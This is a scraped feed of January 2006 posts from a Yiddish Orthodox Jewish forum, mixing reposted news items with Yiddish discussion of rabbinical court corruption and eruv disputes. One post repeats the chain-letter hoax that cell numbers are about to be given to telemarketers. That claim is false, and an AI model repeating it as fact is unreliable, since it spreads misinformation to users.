    א קעשקעטל מיט א נאמבער]]>
    Wed, 4 Jan 2006 14:03 +0200VA +Coal Mine Explosion+ 14:03ShamosWed, 4 Jan 2006 14:03 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1745383
    Tallmansville, VA +Coal Mine Explosion+ An underground explosion at an Upshur County coal mine has trapped 13 miners, a county emergency official said.


    http://vosizneias.blogspot.com/2006/01/tallmansville-va-coal-mine-explosion.html

    ]]>
    Wed, 4 Jan 2006 05:01 +0200אברמוב דערקלערט זיך שילדיג 05:01איןבעיהWed, 4 Jan 2006 05:01 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747816
    א חלק פין די פלי דיעל איז אז ער וועט עדות זאגען קעגען באקאנטע סענעטארען ווי טאם דילעי אא"וו באקאנטע אידען פריינד.


    Jack Abramoff leaves Federal Court in Washington Tuesday, Jan. 3, 2006. The once-powerful lobbyist pleaded guilty Tuesday to federal charges of conspiracy, tax evasion and mail fraud, agreeing to cooperate with prosecutors investigating influence peddling that has threatened powerful members of the U.S. Congress. (AP Photo/Gerald Herbert)

    http://apnews.myway.com/article/20060104/D8ETHFQOC.html
    ]]>
    Wed, 4 Jan 2006 04:13 +0200business cards in brooklyn 04:13tzikuchtWed, 4 Jan 2006 04:13 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747807Wed, 4 Jan 2006 03:38 +0200US planning strike against Iran 03:38y123y123Wed, 4 Jan 2006 03:38 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1744488
    The German newspaper Der Tagesspiegel collected various reports from the German media indicating that the North Atlantic Treaty Organization are examining the prospects of such a strike.

    According to the report, CIA Director Porter Goss, in his last visit to Turkey on December 12, requested Prime Minister Recep Tayyip Erdogan to provide military bases to the United States in 2006 from where they would be able to launch an assault.

    The German news agency DDP also noted that countries neighboring Iran, such as Saudi Arabia, Jordan, Oman, and Pakistan were also updated regarding the supposed plan. American sources sent to those countries apparently mentioned an aerial attack as a possibility, but did not provide a time frame for the operation.

    Although Der Spiegel could not say that these plans were concrete, they did note that according to a January 2005 New Yorker report American forces had entered Iran in 2005 in order to mark possible targets for an aerial assault.

    http://jewishcenteronline.com/forums/showthread.php?t=56]]>
    Wed, 4 Jan 2006 03:32 +0200Cell Numbers Going Public 03:32הצלה2006Wed, 4 Jan 2006 03:32 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747786Cell Numbers Going Public

    JUST A REMINDER, (10) days from today, cell phone numbers
    are being released to telemarketing companies and you will start to

    receive sale calls. YOU WILL BE CHARGED FOR THESE CALLS!
    These telemarketers will eat up your free minutes and end
    up costing you money in the long run. To prevent this, call
    the following number from your cell phone: 888/382-1222.

    It is the National DO NOT CALL list. It will only take a minute of
    your time.
    It blocks your number for five (5) years.
    PASS THIS ON TO ALL YOUR FRIENDS.
    ]]>
    Wed, 4 Jan 2006 01:01 +0200קען מיר איינער דא העלפן E-BAY 01:01CatskillsWed, 4 Jan 2006 01:01 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747563בין איך ארויף אויף e-bay אויף דעם נאמען פון יענעם, זעה איך אז ער איז שוין נישט עוועלעיבל רוף אהן די נאמבער וואס עס איז געקומען אויף די Invoice זאגט יענער ראנג נאמבער, האב איך געזוכט דעם נאמען פון יענעם וואו ער וואינט ער וואינט אין קאלעפארניע, איז ארויפגעקומען א נאמען מיט א טעלעפאן נאמבער, און די נאמבער איז out of service איז שייך נאך עפעס צו טוהן?????]]>Tue, 3 Jan 2006 22:57 +0200Plane Now Down Into Hudson River 22:57ShamosTue, 3 Jan 2006 22:57 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1745492
    U/D: 12:13
    Aviation-15 has one aided on board, U.S.C.G. Chopper has another one both enroute to Jacobi Medical Center Heliport, only 2 aided on board.

    For all the details go to

    http://vosizneias.blogspot.com/2006/01/yonkers-1-engine-plane-down.html
    ]]>
    Tue, 3 Jan 2006 22:44 +0200Monsey Bikur Cholim Filed Lawsuit 22:44ShamosTue, 3 Jan 2006 22:44 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747302
    Suffern - Monsey Bikur Cholim is suing the village so it can continue to operate at its current location and shelter Orthodox Jews during the shabbas and holidays.

    http://vosizneias.blogspot.com/2006/01/monsey-bikur-cholim-filed-federal.html

    ]]>
    Tue, 3 Jan 2006 21:53 +0200Halacha of the Day 21:53bush2008Tue, 3 Jan 2006 21:53 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747418Tue, 3 Jan 2006 20:36 +0200קארופציע ביי בית דין? 20:36בןמלךTue, 3 Jan 2006 20:36 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1562716דערנאך האט ער זיך צעברייטערט און אריינגעלאזט אין א לענגערן שמועס אין די סיבות וואס מאכט מאנכע אידן פארלירן די צוטרוי צו אידישע בתי דינים און זיי לויפן דעריבער אין קאורט.
    האט ער מיט א שטארקקייט געזאגט, אז עס זענען פארהאן געציילטע בתי דינים, וואס זענען ליידער קארופטירט, עס איז א פשוטער ביזנעס, עס פירט זיך פונקט ווי א "Law firm" און אמאל נאך ערגער.
    עס איז דעריבער א פליכט אויף יעדן איד וואס דארף אמאל צוקומען צו א בית דין, הן בין איש לאישתו, והן בין אדם לחבירו, זאל זיך גוט נאכפרעגן צו וועלכע בית דין צו גיין, אזוי ארום זיך פארמיידן די עגמת נפש פון אריינפאלן אין נעץ פון א פאלשע בית דין.
    עס איז געווארן - ווי פארשטענדליך - א הייסע דעבאטע צווישן די עטליכע אידן ביים שיעור, ווי עס זענען געווארן אויפגעברענגט כמה וכמה מעשיות פון התפעלות וויאזוי די גוטע בתי דינים האבן באהאנדלט ענינים, און פארקערט וויאזוי די "ביזנעס בתי דין" האבן טיף בא'עולה'ט מענטשן.
    איין חשובער אינגערמאן האט דערציילט א מעשה נורא וואס האר און נעגל שטעלן זיך אויף. (ער האט עס דערציילט מיטן נאמען פון דעם בי"ד, טענה'דיג אז ס'איז מצוה לפרסם. אבער איך וועל מיך מונע זיין פון זאגן נעמען, אפשר איז עס לשה"ר).
    ער הייבט אן: וויבאלד דער פלוני געוויסער ראש בית דין אין וומסב"ג - לאמיר אים געבן א פיקטיוון נאמען, זרח - איז דאך א ביזנעסמאן, ער זוכט פשוט ארויפצוארבעטן די הכנסות פון דעם "געשעפט" זיינעם, דעריבער איז ער געפאלן אויף א וואזשנע המצאה, ער פאר זיך אליינס, דער זרח טוט זיך אדווערטייזן אלס א "טוען", מיט זיין טעל. נומער. צווישן נאך פיל טוענים איז אויך אדווערטייזט אונזער "זרח". אזוי באקומט ער ביזנעס און מאכט פרנסה אלס א טוען. אביסל דערנעבן אין טעל ביכל איז דא נאך אן אדווערטייזמענט, פון א "בית דין". מיט דעם זעלבן טעלעפאן נומער ווי דעם טוען... א געוואלדיגע המצאה, א כל-בו געשעפט, אלעס אינאיינעם א פול סערוויס טוען, און אויך, א פול סערוויס בית דין.
    נו, וואס שלעכט? אפשר טאקע גוט, וואן סטאפ שאפינג.. אבער, לאמיר צוקוקן אביסל פון די נאנט די גרויסארטיגע פארצווייגטע פעולות פון דעם "טוען-בי"ד", א איד קומט אריין פארלוירן: מיין שכן האט מיר ארויפגעלייגט אן עיקול, איך דארף שוין א טוען. בארואיגט אים ר' זרח, און זאגט אים, זיי נישט פארלוירן, פאר א נישטיגן פרייז גיב איך דיר א "הסרת העיקול". וחסל. קוקט אים יענער אן מיט פרעגנדע אויגן, נישט וויסנדיג וויאזוי קען א טוען מאכן אן עיקול זאל ווערן אזוי שנעל אויס, דערווייל נעמט דער זרח ארויס א "לעטער-הער" פון זיין "בי"ד", און דער קליענט פארשטייט שוין אלעס. דערנאך איז דער "טוען" ממשיך, יעצט מיט דעם עיקול האט דאך יענער געשיקט א הזמנה לדין תורה, אויב שיקט ער דיר נאך איינס, לאז אים וויסן אז תובע הולך אחר הנתבע, און דו ווילסט דיך מתדיין זיין ביי מיר, נאכן אויסשטעלן א טשעק און די זיצונג איז פארטיג.
    די זענען מעשים בכל יום "סטענדערד פראצעדורן" פון דעם "טוען בי"ד קאמפאני". והמפורסם אין צריך ראי'.
    יעצט - זאגט ער - גייט ער דערציילן א מעשה וואס האט פאסירט דאס יאר. צוויי שותפים משה און גרשון האבן געהאט א גאר טיפן און שווערן סכסוך, זיי זענען שוין געווען גוט צוקריגט ווען משה איז אריינגעקומען צום "טוען בי"ד" פארלאנגען נישט מער און נישט וויינגער ווי א היתר לערכאות, ווייל צום ערשט מוז ער מאכן א "ליען" און א "ליעס פענדינס" אז גרשון זאל נישט אלעס ארויס ראבעווען, אויך וויל ער שוין אריינברענגען דעם גאנצן סכסוך אין קאנטראל, ווייל ער האט גראדע זייער א גוטן לויער... דער ראש בית דין האט אים נישט אנגעשריגן, און נישט ארויסגעווארפן, ער האט אויך נישט פארלאנגט ער זאל צום ערשט גיין צו א בית דין כשר בישראל. נאך א קורצע ביזנעס מיטינג, איבערלאזנדיג א געהעריגן "סכום הגון" פארן טוען & קאמפאני, האט ער ארויסשפאצירט מיט א היתר לערכאות. ער האט אזוי שנעל באקומען דעם בריוו אז ער האט זיך עס אליינס נישט געגלייבט. שוידערליך!
    אבער די מעשה ענדיגט זיך נישט דא. דער שותף גרשון קומט אריין אין ביזנעס איין טאג. ער ווערט דערשראקן ווען ער זעט ווי עס ווארט אים אפ א שליח מיוחד מיט א "בריוו" ווי די קאורט לאזט אים וויסן אז אלע נכסים פון געשעפט זענען געפרוירן,זיינע פריואטע נכסים זענען געפרוירן, און, בייגעלייגט איז אן "ארדער אוו פראטעקשאן" אז ער טאר נישט קומען ביז הונדערט פיס נאנט צו זיין ביזנעס, און ביז הונדערט פיס פון זיין שותף משה'ס הויז. (פשוט פאר זיין זיכערהייט).
    גרשון שטייט פארגליווערט און זעט שטערן'ס, ס'שווינדלט אים ביז ארויף און ער פארלירט דאס גלייכגעוויכט. די לעצטע חדשים לויפן אים דורך פאר די אויגן. עטליכע מתווכים האבן שוין פרובירט מפשר זיין צווישן זיי, מ'האט שוין עטליכע מאל גערעדט פון גיין צו א בית דין. ער האט שוין אפילו שטילערהייט געהאט געדונגען א טוען, אלעס איז געגאנגען רואיג, אן קיין טעראר און אן קיין שמוץ. קאורט מאן דכר שמי'. אבער אזא פליק, ביי ארדער אוו קאורט...
    ער מאכט אן עמורדזשענסי אפוינטמענט און ער לויפט אויף אלע פיר אריבער צו זיין טוען, מיט וואקלדיגע פיס דערציילט ער דעם טוען ווי זיין לאנגיעריגער שותף משה איז געלאפן צו ערכאות אן א התראה, אן רעדן צו א רב, ער שטייט אן ווערטער.
    דער טוען האט אים תיכף געהייסן קאנטאקטן א גוטן לויער. און דערווייל רופט דער טוען אן דעם משה, און זאגט אים, ענטפער מיר בלויז איין שאלה: ווי האסטו נישט מורא צו גיין אין ערכאות אן א היתר פון א רב?, ער בעט דעם טוען זיין פעקס נומער, ער גייט אים ענטפערן מיט די פאקס.
    ביז עטליכע מינוט האט דער טוען אויפן טיש א געדרוקטן היתר פון יענע "טוען בי"ד". דער טוען רופט אן גרשון'ען און זאגט אים אהובי ידידי, דיין בעל דין האט א היתר פון ... קא.
    גרשון שרייט, וויאזוי קען עס זיין? דער טוען זאגט אים הער מיך אויס, איך האב נישט קיין לעטערהעד, אבער בעל פה קען איך דיר אויך געבן דעם זעלבן היתר, ווען עפ"י הלכה דארפסטו שוין נישט קיין היתר וויבאלד יענער האט דיך אריינגעשלעפט אין געריכט. דער גרשון איז נישט געווען רואיג מיט דעם, האט ער זיך פארבינדן מיט א גרויסן רב אין חו"מ ענינים, און יענער האט דורכגעקוקט זיינע פאפירן און און געזאגט דו מעגסט רואיג גיין להציל את שלך.
    ער האט גענומען א גוטן לויער, און געגעבן זיין מעשה, און די קאורט האט פארשטייט זיך אנגעהויבן אויך משה'ן צו קעיר נעמען און קאפענען. משה'ן ווערט זויער, יענער איז אויך אריין.. וואס טוט מען? נישט גע'דאגה'ט. דער קאמפאני קען דאס אויך מסדר זיין. ער לויפט אריבער צום ב"ד קא." און דער טוען-ראב"ד האט שוין ארויסגעדרוקט א בריוו און אפגעשיקט צו גרשון ער זאל שוין תיכף ומיד ארויסגיין פון ערכאות ווייל ער איז א מרים יד בתורת משה!
    וואס עס איז ווייטער פארגעקומען איז נישט וויכטיג צום ענין, עס ווערט שפעט און איך מוז שוין ענדיגן, אויך ווייל דער סכסוך איז נאכנישט אינגאנצן פארטיג.
    מיר זענען געזעצן און מיט אפענע מיילער געהערט און געשטוינט. איך האב נאכ'ן אויסהערן דאך געהאט אביסל ספיקות אין די פונקטליכקייט פון די מעשה. פריער האט מיך דער פארציילער ארויפגעלייגט אויפן טעלעפאן מיט א גאר חשובן איד וועלכער איז געווען פארמישט אין פרואוון צו שלום מאכן צווישן די צוויי שותפים, און ער האט עס מיר קלאר באשטעטיגט, און ער האט נאך צוגעלייגט, אז ער איז זיכער אז ביז א שטיק צייט וועט זיין א גרויס גערודער פון די אלע מעשי נבלה, און עס קען נישט צו לאנג אנגיין. דער ב"ד דארף נאר טרעפן איין "בחור" מיט ציין אין די מויל און ער וועט אים צושמירן ביז גאר.
    איך האב שוין געהאט געהערט פון לאנג אז יענער טוען-בי"ד איז באוואוסט אין די עולם היהדות אלס א צענטער פאר עיקול'ס "הסרת העיקול"'ס והיתרים לערכאות אויף א גרויסן פארנעם אבער אעפ"כ האב איך נישט געקלערט אז דאס איז אויף אזוי ווייט.]]>
    Tue, 3 Jan 2006 20:03 +0200בילדער פון חנוכה בבית האדמורי"ם 20:03NatanyaTue, 3 Jan 2006 20:03 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1733317
    תוקן על ידי - natanya - 26/12/2005 1:33:16]]>
    Tue, 3 Jan 2006 19:59 +0200שבת אין מאנסי 19:59מלוה_מלכהTue, 3 Jan 2006 19:59 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747041מאנסי אומגעגענט , אדער מאנרא , צו וויילן אויף א שבת, מיט עסן ?

    אויב יא נעבן ביהמ"ד מקוה ?

    א דאנק פארן מודיע זייין..]]>
    Tue, 3 Jan 2006 19:26 +0200קאץ כאפט א היטש מיט SUV א 19:26חייםמרדכיTue, 3 Jan 2006 19:26 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747052
    The kitten, now known, for obvious reasons, as Miracle, hitchhiked a ride on the underbelly of a sport utility vehicle just before Christmas. The gray and white feline traveled some 70 miles under the vehicle as it whizzed along the Turnpike on Dec. 23.

    "I'm just amazed that the cat didn't fall off or get blown off," Karen Dixon-Aquino, director of the Animal Welfare Association in Voorhees, told the Courier-Post of Cherry Hill for Tuesday's newspapers.

    The association is caring for the furry hitchhiker and plans to put him up for adoption.

    The SUV's driver was traveling from Newark to Cherry Hill and didn't know she was giving the kitten a ride until another motorist saw the tabby through a wheel well and flagged the driver over near Interchange 4 in Mount Laurel.

    Dixon-Aquino said the cat probably climbed into the guts of the SUV in Newark and was asleep when the journey began. Somehow, the cat avoided being mangled by fan blades and other moving parts as he clung to the car for the ride.

    The kitty, estimated to be about 8 or 9 months old, was not unscathed, though.

    "He was pretty freaked out," Dixon-Aquino said. "His paws were burnt, one claw was missing and his fur was singed."



    ווען ער זאל כאטשיג אריינטשיפען ביי די געז, בעסער פין יענעם וואס די קאץ האט אים אויסגעשפארט פין די קאר

    איך וואלט געזאגט פארן דרייווער אז ער זאל גיט קוקען עס קען זיין אז ער האט אויך מייז]]>
    Tue, 3 Jan 2006 19:03 +0200א אידישע פרוי אן אינווענטאר 19:03סעמאן_פישTue, 3 Jan 2006 19:03 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1746152
    From babies and Legos comes high tech innovation
    By Aryeh Dean Cohen January 01, 2006

    It's doubtful that Las Vegas bettors would have put any money on an ultra-Orthodox Israeli schoolteacher and mother of five taking the city by storm and setting 2005's annual Consumer Electronics Show on its ear. But that's exactly what inventor and super mom Sarah Lipman did, overcoming the odds while casting a whole new light on the way users can interact with their computers, cell phones, and other electronic devices.

    She's not alone. Indeed, Lipman, who heads her own company - Power2Be Technology - represents part of a new generation of strict religiously observant Israeli women who are finding ways to merge their talents for technology with their strong commitments to family life. Finding that balance is producing a bounty of innovations, while at the same time allowing the women the satisfaction of sometimes seeing their child's first step just a few feet away from the computer being used to work on their latest project.

    Former Los Angeles elementary school teacher Lipman, 33, says she "fell into high tech backwards," noting that while she's always had a penchant for inventing things, she never saw this one coming. She and her husband Michael were enjoying a vacation in Scotland when she literally saw the light.

    Maybe it was the lighthouse she was looking at in the distance, but the idea came to her in a flash. "I was using my Palm, and I thought: 'If this thing could see me coming, it could bring me up what I wanted before I got there. Because I'm giving off all of this body language as I approach it - anyone watching me can see what I'm doing, but the computer can't.

    "If you were watching me use the Palm, you would see that I was heading for the 'contacts' or the address book, or whatever. But the computer doesn't see me coming, so it doesn't give any response ahead of time. But then I started thinking: 'Gee, how could a computer or a Palm or a cell phone see me coming. And I worked it through and I realized I had something. And my husband said: 'Let's patent it,' and we did."

    Interviewed in the living room of her "office," her Jerusalem home where baby toys or Lego mix happily with computers, a battery of phones, and a printer affording her the ability to be both mom and inventor, Lipman insists that the very fact that she did not have any previous experience in the high tech world works to her advantage.

    "We discovered that we had actually made a tremendous breakthrough in the entire area of interface and interface design that probably had a lot to do with the fact that I wasn't in the business yet, so I wasn't influenced by the current ways of doing things. I wanted something practical, and because of my background, which is a very strong interest in math and science, the way that I came to it was to think about the way light works and the way light propagates, rather than the way engineers approach it, which is what components can you put together to achieve the effect you want," she told ISRAEL21c.

    The technology is based on a stylus which emits invisible light, like a Palm stylus but "really small," she explains. "That light, when it hits the screen, interacts with the display. We've harnessed the propagation of the light and the qualities that it has, and we found that we can interpret out from that where the stylus was when the light hit it."

    "Power2Be technology enables three-dimensional interaction with any kind of computer device, and in so doing allows for very, very intuitive interaction at any level, and in any kind of program," Lipman explains. Applications run from revolutionizing the way one interacts with one's TV and remote to offering 3-D effects for computer games. "We have done away with several very convoluted and discouraging steps," says Lipman

    A group of engineers at the Jerusalem College of Technology's Machon Lev institute that Lipman met with on her return to Israel "kind of looked at me and said: 'Well, you can't do that - there's no hardware that does that.' And I said: 'But just think a minute, that's how it works, it's gotta work like that.' I'm somebody who builds a picture in my mind, and if it works well enough in my mind, then I'm pretty sure it'll work in real life. So they tried it and it did work."

    Tests showed that her invention worked, first with a piece of plexiglass, then with an LED, and finally a Palm T-3. The final version which is being completed, is based on a Nokia Smartphone, along with demo software.

    So how do you get the word out that you've discovered light, or at least a way of using it that opens new frontiers in the world of interface? Simple, you go to Vegas. "I went with my very good friend - she's a rebbitzen (wife of a rabbi). She said: 'Sarah, you can't go to Las Vegas alone - I'm going with you.' So she left her eight kids and I left my five at the time, and off we went."

    Not even a CSI investigator would have believed she was the hottest property at the Consumer Electronics Show, but she was. "It was very gratifying, because I don?t look the part. Even if people don't know I'm a schoolteacher, I still look more or less like a mom. I walked around to some of the big players, and they would hear me and all of a sudden their eyes would light up."

    Through the buzz generated at the conference, a series of "very big players" whose name she won't reveal wanted to meet with her. "It turned out that these companies have been thinking about the kind of functionality that our technology provides. And all of a sudden, here I come out of nowhere and say: 'I've got this technology.' And they go: 'Wow,' and I sort of felt like an angel for them when I offered them that."

    Upon her return to Israel, the first thing she and her husband did was "to fill the house with a lot of equipment," although now they are moving some of it out to an office.

    "The kids need a house, not a laboratory," she says. Still, the interaction with her family feeds her creativity, with the children themselves now coming up with their own "inventions," including her daughter's discovery: a pen that writes by using recycled, wetted crepe paper. It's an atmosphere she says many ultra-Orthodox women crave to feel comfortable about mixing a career with family life, with auspicious results for the Israeli business world, particularly high tech.

    "I think this trend of women getting more involved in high tech is inevitable...there are many religious women in programming...I think if suddenly we have thousands and thousands of women programming, they're going to understand computers at a much deeper level, and some of them are going to have ideas that take off. I don't see it not happening."

    Lipman also believes that the religious training she and other ultra-Orthodox women share gives them a different and important outlook on high tech. "It has a lot to do with training and how you think. When you learn to read a verse and read a commentary by Rashi and not let any word get past you that you don't understand...if you're grounded properly, then nothing goes by without a question, and you assume that there's an answer. And that is a very different approach to engineering and invention, which is: Gee - who says I have to take it for granted that things are this way. Maybe there's another way...it's a different way of thinking, and it's an education which encourages you to think deeply, not to take things at their surface value. So I think that is a profound advantage."

    "One of the most important issues I juggle with as a founder/mom is working hours," explains Lipman, a mother of six. "It's important to me to be available to them at important times, like bedtime. To do that. I save 'thinking work' for non-kid hours. Typically I work from 8:30 or 9 a.m. until 2 p.m., then take calls only, or have meeting in the house, until the kids go to sleep around 8:30. I get back to work at night, usually until around midnight. Working at home (and having a laptop) has allowed me the freedom to do most of my work at the times best for me and my family."

    Lipman admits with a laugh that such a work experience sometimes has her "on the phone thinking: 'It's a good thing they can't see me, because I'm burping a baby while we speak, and in the back the other kids are all being very carefully quiet, and building with Legos or something... we told the kids: Do not answer line 3."

    She credits her success - there's a "pile" of inventions waiting to be patented and produced - to her husband's drive, but chiefly to divine inspiration. Interviewed on the week of the reading of Bereishit, which describes God creating light, teacher-turned inventor/mom Lipman said that the spiritual side of her work "is more the way that light works, the way the world works...It speaks to me in a sense that there is a Creator, and therefore there is a level of inherent consistency and inherent elegance and perfection, and because of that...you can harness it and you can utilize that to create all kinds of amazing functions and technologies."

    ]]>
    Tue, 3 Jan 2006 19:02 +0200גרעסטע דריידל 19:02חייםמרדכיTue, 3 Jan 2006 19:02 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1747008
    A group of Jewish university students in Montreal are confident it is the world's biggest dreidel, and they have applied to Guinness World Records to have that fact established.

    More than 20 students built the giant dreidel out of wood and particle board in the lobby of Congregation Beth Ora by for the West Island Hillel's Chanukah party.

    With its base, the free-standing structure measured 25 feet, 91/2 inches, said Hillel Montreal's Yoni Petel, but the dreidel itself was 22 feet, 21/2 inches. The four Hebrew letters – shin, hey, gimel and nun – were each about six feet high and made of paper, which was taped on.

    The dreidel did indeed spin on its base, with a good push from a tall person. ''I'm 6-foot-2,'' said Petel, ''and I could barely reach the face.''

    Rabbi Avi Rosenblatt, who authenticated its kashrut, and accountant Sandy Jesion, a vice-chair of the FEDERATION CJA West Island management committee, served as the witnesses necessary for consideration by Guinness.

    Petel said the students were casting about for ideas on something different to do for Chanukah. ''We had thought of making the world's biggest latke, but it would have been a fire hazard and we weren't really sure if we knew how to do it. A dreidel was the obvious second choice, and we checked with Guinness and found no dreidel entries.''

    The next question was where to construct it. They ruled out the outdoors because they were afraid of wind toppling their creation. The group looked on the West Island, but no synagogues or Jewish institutions had high enough ceilings to accommodate the top they envisioned. Beth Ora in St. Laurent was the closest alternative because its lobby soars almost three stories. Care had to be taken to avoid the chandelier.

    The dreidel took about nine hours to build, and involved working from a scaffold. It took about 10 students to lift it onto the base. Then the party began. ''You could see about three-quarters of it outside through the window, making the synagogue look like a dollhouse,'' Petel said.

    The costs of the dreidel were covered by an Innovation grant from National Jewish Campus Life.

    Alas, the monster could only be kept up for two days. The students are keeping the parts and may try to reassemble the dreidel next year. ''But we would be happy to donate it to anybody interested,'' Petel added.

    מיר דריידט זיך די קאפ נאר פין קוקען אויפן דריידל]]>
    Tue, 3 Jan 2006 18:12 +0200מאה שערים ווענט שרייען 18:12חייםמרדכיTue, 3 Jan 2006 18:12 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1746789Israel's ultra-Orthodox use posters as salvos on secular society

    By Joel Greenberg
    Tribune foreign correspondent
    Published January 3, 2006

    JERUSALEM -- The fiery posters with bold black letters fairly shout from the walls of Mea Shearim, the teeming neighborhood of rigorously Orthodox Jews in the heart of Jerusalem.

    "Watching movies is prohibited," declares a sign plastered on a wall. "These clothes are forbidden!!!" reads another, warning women against wearing tight-fitting garb.

    In vivid language, the posters exhort the faithful to beware of temptations on the streets, admonish women to dress modestly, announce demonstrations and launch broadsides at Orthodox leaders deemed to be cooperating with Israel's secular establishment.

    The wall posters, known by their Yiddish name, pashkevils, are a window into the life of a cloistered community that is clinging to its traditions at a time of rapid change.

    About 10 percent of Israeli Jews are ultra-Orthodox, according to unofficial estimates. Known in Hebrew as haredim, or God-fearing, they generally live in separate neighborhoods, maintaining their own schools, synagogues and social welfare institutions. They are easily identifiable by their distinctive clothing: men in black hats and coats and women in long dresses, their hair covered with kerchiefs, hats or wigs.

    Although there are ultra-Orthodox representatives in the Israeli parliament, and some have served as Cabinet ministers, the more fervent branches of the community are a world apart from the mainstream of predominantly secular Israeli society.

    Many ultra-Orthodox men devote themselves to full-time religious study, receiving state stipends, tax breaks and exemptions from compulsory military service under long-standing arrangements with the government.

    The arrangements have angered secular Israelis, who usually serve in the army. They also have contributed to widespread poverty in the ultra-Orthodox community, where the absence of many men from the workforce has made their traditionally large families dependent on state assistance and charities.

    The ultra-Orthodox argue that military service violates their religious way of life and that religious studies keep alive a sacred heritage that has preserved the Jewish people throughout history.

    Many Israelis resentful

    But many Israelis see the rigorously Orthodox as shirking burdens shared by the rest of society, a rift deepened by the ultra-Orthodox view that Jewish law takes precedence over the demands of the secular state.

    With its strict brand of Judaism and an indifference or outright hostility to secular Zionism, the ultra-Orthodox community has to fight a constant battle to fend off the pervasive influences of mainstream Israeli culture.

    Nachman Ben-Yehuda, a sociologist at Hebrew University in Jerusalem, said the posters serve as both wall newspapers and morals police.

    "Their main function is social control," he said. "They tell people what to do and what not to do."

    Originating in Jerusalem in the early 1900s, the posters now are common in ultra-Orthodox towns and neighborhoods across Israel. Often the notices are signed by well-known rabbis, but many also bear the names of unknown groups, masking factions using the posters to denounce opponents.

    Over the years pashkevils have commented on a broad range of issues affecting the ultra-Orthodox community. They have attacked the opening of movie theaters and restaurants on the Jewish Sabbath, condemned the excavation of ancient graves by archeologists as a desecration of Jewish remains and railed against traffic arrangements that allowed motorists near Orthodox neighborhoods on the Sabbath.

    A poster plastered on the walls in Mea Shearim this week, signed by The Committee to Save the Youth in the Holy Land, urged students at religious seminaries, or yeshivas, to steer clear of the mass media and stay in the study halls.

    'Avoid the media of all kinds'

    "Any departure from the confines of the yeshiva and a short stay on the street is disastrous for the soul of the yeshiva student," the poster declared. "Every youth who aspires to master the Torah and build his future in the vineyard of the house of the Lord should know that he must completely avoid the media of all kinds. . . . Interest in the news turns the heart away from the fear of God."

    The poster goes on to call for "the complete eradication of the newspapers and color magazines that mix good with bad, put the wicked with the righteous ... and confuse the minds of the youth."

    Down one street, a poster warned women against wearing body-hugging Lycra shirts and "narrow, straight skirts," noting that modest dress "arouses the mercy of God." Another notice pronounced that watching movies leads to "the destruction of modesty, God forbid."

    A poster warned against riding buses operated by Egged, the Israeli bus company, because of mixed seating of men and women. Another inveighed against attempts to introduce a secular "core curriculum" in Orthodox schools, declaring that it would marginalize religious studies.

    Plans to recruit some ultra-Orthodox youths into the Israeli army and enroll others in alternative national service programs were denounced in posters as an attempt to "assimilate them in the abomination of the general free society." Ultra-Orthodox lawmakers were accused of collaborating with the recruitment plans and labeled "traitors serving the hatchet raised against the Torah and the faith."

    The posters sometimes generate heated debate in ultra-Orthodox circles, with warring factions tearing down or covering up notices put up by their opponents.

    But on a chilly afternoon last week, Moshe Zhilovsky, a black-clad yeshiva student, barely stopped to look at the screeds on the wall, dismissing them as a waste of time.

    "This is politics," he said. "Real people don't like politics. There are more interesting things to do, like studying Torah and worshiping God."

    ----------

    jogreenberg@tribune.com





    Get all "Heimishe" Breaking News delivered directly to your cell phone http://www.upoc.com/group.jsp?group=vosiznies]]>
    Tue, 3 Jan 2006 12:27 +0200וועלן זיי באקומען שכר אויף יענע וועלט? 12:27דיפלאמאטTue, 3 Jan 2006 12:27 +0200http://hydepark.co.il/hydepark/topic.asp?topic_id=1640840
    וועלן די וואס שרייען אין די גאסן אויף אנשים נשים וטף וואס טראגן מיטן כשר'ן ערוב, באקומען שכר אויף יענער וועלט פאר די גרויסע מצוה פון נאכשרייען פרויען און לערנען זייערע קינדער אז נאר וואס זיי האלטן איז תורת אמת און אנדערש קען גארנישט זיין? און אז צו שטיין אין די לאנגע שבת נאכמיטאגס וואס אמאל האט מען געוואוסט אז מען טאר זיך נישט זוימען קיין רגע ווייל דאס איז די צייט וואס די גאסן זענען פיל מיט פרויען און עס דארף אויסגענוצט ווערן בלויז פאר זיצן און לערנען, און היינט צוטאגס האט מען געלערנט די קינדער צו שטיין און זוכן פרויען וואס זייער גאנצער חטא איז ווייל זיי פאלגן נאר אויס זייערע רבנים וואס ערלויבן זיי צו טראגן מיט דעם עירוב, און זיי נאכזידלען מיט די מיאוס'טע לשונות של גנאי. וואס איך מיין צו פרעגן איז אויב זיי וועלן באקומען שכר אויף דעם וואס זיי מיינען עס אמת'דיג, און האלטן טאקע ווי זייער קארופטירטער חינוך האט זיי אויסגעלערנט צו האלטן אז די וואס פאלגן זיי נישט זענען עתיד ליתן הדין.

    די וואס טוען דאס נאר פאר די "פאן" איז פשוט אז זיי באקומען שוין זייער שכר דא אויף די וועלט, און וועלן גארנישט האבן קיין תביעה דארט אויבן, אבער די וואס פאלגן נעבעך זייערע רבנים, (וואס זענען ליידער געטריבן פון דעם אני ואפסי מענטאליטעט, ווי ער איז ערצויגן געווארן) אויף די איז די פראגע, וועלן זיי עפעס קענען פארלאנגען?

    (אגב איז געווען א מחי' צו זען דעם שבת אז ערליכע אידן האבן זיך ערלויבט צו טראגן אן קיין מורא, און אן פחד פאר דעם טעראר ווי יעדע וואך, ווייל די קעלבלעך האבן נישט געוואוסט מבחין צו זיין צווישן אן עירוב וואס דארף בלויז זיין צווישן הויז און די סוכה, און וויסנדיג אז שבת חוה"מ "מעג" מען מאכן א עירוב, האבן זיי פארשטאנען אז אין גאנצן שטאט מעג מען טראגן. ה' הטוב יכפר. אזוי האב איך געקענט טראגן אן דעם וואס איך זאל זיך דארפן שלאגן, ווי יעדע וואך...) ]]>
